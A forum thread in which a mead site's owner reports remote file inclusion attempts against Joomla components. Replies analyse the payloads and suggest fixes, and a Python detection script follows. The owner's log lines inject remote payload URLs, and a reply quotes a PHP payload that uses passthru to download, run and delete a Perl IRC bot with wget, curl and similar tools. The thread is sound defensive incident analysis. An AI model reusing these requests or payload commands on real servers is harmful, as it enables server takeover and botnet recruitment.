
Gotmead.com being exploited by IRC hacks - any suggestions?

pain

GotMead Owner
Staff member
Administrator
Moderator
Apr 5, 1996
1,635
3
38
North Carolina
gotmead.com
Gang, I'm working on the search issue, but my host just informed me that we're being exploited by IRC hackers, to wit:

Code:
/component/option,com_pccookbook/page,viewrecipe/recipe_id,119/mead-research/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
/component/option,com_pccookbook/page,viewrecipe/cat_id,1/recipe_id,1/mead-research/component/option,com_smf/Itemid,183/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
/index.php?option=com_smf&Itemid=397&action=login//components/com_smf/smf.php?mosConfig_absolute_path=http://azpcrepair.com/siteb/plugins/spamx/id.txt?
//components/com_smf/smf.php?mosConfig_absolute_path=http://azpcrepair.com/siteb/plugins/spamx/id.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
/index.php?option=com_smf&Itemid=397&action=login//components/com_smf/smf.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
//components/com_smf/smf.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/cmd.jpg?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
/index.php?option=com_smf&Itemid=397&action=login//modules/mod_calendar.php?absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
//modules/mod_calendar.php?absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.thomashamilton.net/id.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.thomashamilton.net/id.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/vampirehack/Strings.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/vampirehack/Strings.txt?
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://aespeechanddrama.org/components/com_smf/echo.txt??
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
If you are an expert in php security or know of ways to block this, please email me at gotmead AT gotmead DOT com. I'm working on this, but am hampered by not being able to change the core code of the site without trashing the whole site.

Vicky - harried and typing as fast as I can
 

Arjan

NewBee
Registered Member
Jun 22, 2007
170
0
0
44
From a quick Google on the problem I found out there's a security leak in the Joomla <-> SMF bridge which can be exploited by IRC

I don't know the writers/programmers of the bridge, but perhaps check their website for an update
 

Arjan

NewBee
Registered Member
Jun 22, 2007
170
0
0
44
Vicky - GM Webmistress said:
If you are an expert in php security or know of ways to block this, please email me at gotmead AT gotmead DOT com. I'm working on this, but am hampered by not being able to change the core code of the site without trashing the whole site.

Vicky - harried and typing as fast as I can
A tip I got (I had about the same experiences on my community as GM has gone through..):
I went from an open-source forum to a commercial one.

I never ever regretted the day I decided to convert my forums to vBulletin. It's well worth the money, and very easy to add some mods (which are all checked by vBulletin developers) that do the same as GM has now (articles + forum).

There are two options in that which I can recommend:
either vBAdvanced (for portal and articles) + vBulletin
or vBAdvanced (for portal) + vBulletin + MediaWiki (for articles) (I prefer this one.. see my site as an example: www.birthright.net )
 

zionpsyfer

Got Mead? Patron
GotMead Patron
May 17, 2007
58
0
0
Denver
Vicky,

I'm no expert on XSS, nor am I familiar with SMF. But looking at the logs you posted, it appears that the poor script kiddie is running a script that's just brute force attempting various combinations in the hope that one will work.

Some of the tools linked to in the logs are:
http://www.freewebtown.com/vampirehack/Strings.txt ( just as it sounds, a list of strings indicating vulnerable installations)
http://www.thomashamilton.net/id.txt (poor welding company is being used to host this)
http://aespeechanddrama.org/components/com_smf/echo.txt (this just contains a php command to echo "1122548")
http://www.the-esao.com/imag/stringa.txt (php script to check for permissions to execute the exec(), shell_exec(), system() or passthru() functions, grabbing the current disk usage)
http://paginas.terra.com.br/lazer/lunero/id.txt (another php script to check the OS and permissions to execute commands. This script attempts to play around with cookies. It determines the username that apache is running as, as well as which kernel release the webserver is running. It then sets cookies with that data. This is very useful if you're going to try to completely take over the machine.)

Sprinkled throughout are attempted fopens to http://someone.co.il/onfokh.gif?
No surprise here, but there's not an image at that URL... instead there is a *gasp* PHP script that contains the following code

Code:
<?
passthru('cd /var/tmp;wget http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
passthru('cd /var/tmp;curl -O http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
passthru('cd /var/tmp;lwp-download http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
passthru('cd /var/tmp;lynfile.txt -source http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
passthru('cd /var/tmp;fetch http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
passthru('cd /var/tmp;GET http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
?>
:)
So they're trying to get the webserver to download and execute the perl script at http://someone.co.il/someone.txt, removing it afterwards.

Now, a lot of that Perl script is in Portuguese.... But they set up the script to join channel ' ##ddos3## ' on the server internetron.bsd.st.

My brain is starting to bleed from all the Portuguese Perl (and I thought Perl couldn't get any worse!) But I see a sub in there for DCC file transfers. Then again this looks like a modified DDoS script, so that may be left over. At any rate though, I'm not going to finish reading it... whatever it's doing, it won't be good.

My advice, in addition to blocking the IP address block of the originating attack: I'd block internetron.bsd.st ( 209.63.212.17 ) as well as irc.gigachat.net ( 66.252.24.10 ) (gigachat.net is mentioned in the comments of the Perl script, though I didn't see it used).

If your host is willing (and it won't break anything), I'd also disable shell_exec, passthru, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, exec and system in the php.ini. This may very well not be feasible; at the very least allow_url_fopen should be disabled.

Just a guess, but if he had broken in he probably would have left his nice little card that he spent so much time on. Following that we'd probably be constantly bombarded by nasty posts throughout the forum and admins might find themselves locked out.


Hope this helps in some way.
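A small triage script for the request lines Vicky posted and for the block list zionpsyfer suggests, added here as an example (not code from Gotmead, Joomla or SMF). It assumes each input line is either a bare request path as posted above or an Apache combined-log line containing `"GET /path HTTP/1.1"`; the sample lines are constructed to mirror the thread's, and the parameter names it treats as include paths are the two seen in those logs.

```python
import re
from collections import Counter

# Any query parameter whose value is a remote URL is a candidate include()
# injection. mosConfig_absolute_path / absolute_path are the names seen in
# the thread; other parameter names are reported too, for triage.
URL_PARAM_RE = re.compile(
    r"(?P<param>[A-Za-z_]\w*)=(?P<url>(?:https?|ftp)://(?P<host>[^/?&#\s]+)[^?&#\s]*)",
    re.IGNORECASE,
)
KNOWN_INCLUDE_PARAMS = {"mosconfig_absolute_path", "absolute_path"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')  # Apache combined-log format


def request_path(line: str) -> str:
    """Return the request path from a combined-log line, or the bare line as posted."""
    m = REQUEST_RE.search(line)
    return m.group(1) if m else line.strip()


def find_rfi(line: str) -> list:
    """One finding per URL-valued parameter. Scans the raw path rather than a
    parsed query string: the injected URL often sits after a second '?' (the
    action=login//... lines in the thread), where a query parser would bury it."""
    return [
        {
            "param": m.group("param"),
            "host": m.group("host").lower(),
            "payload": m.group("url"),
            "known_include_param": m.group("param").lower() in KNOWN_INCLUDE_PARAMS,
        }
        for m in URL_PARAM_RE.finditer(request_path(line))
    ]


def payload_hosts(lines) -> Counter:
    """Count payload hosts behind known include parameters: the egress block list."""
    return Counter(f["host"] for line in lines
                   for f in find_rfi(line) if f["known_include_param"])


# Constructed sample, modelled on the request lines posted in the thread.
SAMPLE_LOG = """\
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
/index.php?option=com_smf&Itemid=397&action=login//components/com_smf/smf.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
//modules/mod_calendar.php?absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
/index.php?option=com_content&task=view&id=12
""".splitlines()

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(find_rfi(line))
    print(dict(payload_hosts(SAMPLE_LOG)))
```

Hosts that show up only in parameters such as a redirect URL are still listed, with `known_include_param` false, so they can be reviewed rather than blocked automatically.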
 

Oskaar

Got Mead Partner
Administrator
Dec 26, 2004
7,874
5
0
31
The OC
Thanks for the dangerous journey through the Portuguese Perl!

We've got most of what you pointed out done at the php.ini level, and the bridge hacks have also been shut down. There are a couple of things that we're working with our new host on, and we'll be sure to see about the additional php.ini suggestions you made.

thanks so much for the analysis,

Oskaar
 

zionpsyfer

Got Mead? Patron
GotMead Patron
May 17, 2007
58
0
0
Denver
Yeah I was pretty late on the reply. :-[ On the bright side, it was an interesting rabbit hole to play around in. ;)


Glad you guys have got it covered!



Cheers